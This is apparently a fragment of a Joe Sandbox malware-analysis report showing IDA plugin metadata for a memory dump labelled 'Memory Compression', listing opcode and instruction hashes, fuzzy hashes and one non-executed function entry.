                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1c3793899e74988778d620f26c1e6b94808694aef74b3bdca11a110d8a4c849c
                                      • Instruction ID: 805c8ac2244c1e409037d90ecea76f7b85daba154eb5b6794332551378a9b6a6
                                      • Opcode Fuzzy Hash: 1c3793899e74988778d620f26c1e6b94808694aef74b3bdca11a110d8a4c849c
                                      • Instruction Fuzzy Hash: EBD012B0C0862D8BDF00DFA0CC10AEE73B1BF10340F000566900AAB2C5CBB86948CB51

                                      Non-executed Functions

                                      Function 00007FF886EE1597 Relevance: 11.5, Strings: 9, Instructions: 240COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: !$"$#$+$-$/$[${$}
                                      • API String ID: 0-3989209503
                                      • Opcode ID: 6d69f1c575fa24a89efaa86438dd4f00321fa4af7925690356c0dd8bd8ebce08
                                      • Instruction ID: 38bf1e27ccb928f26d741cd526bd30adfa94575ddc1e5a897dc569b4052b0e2a
                                      • Opcode Fuzzy Hash: 6d69f1c575fa24a89efaa86438dd4f00321fa4af7925690356c0dd8bd8ebce08
                                      • Instruction Fuzzy Hash: F1B1C370D082298FEBA8DF54D8987EDB7B1BF49341F2045B9D04EA6281CB386E85CF51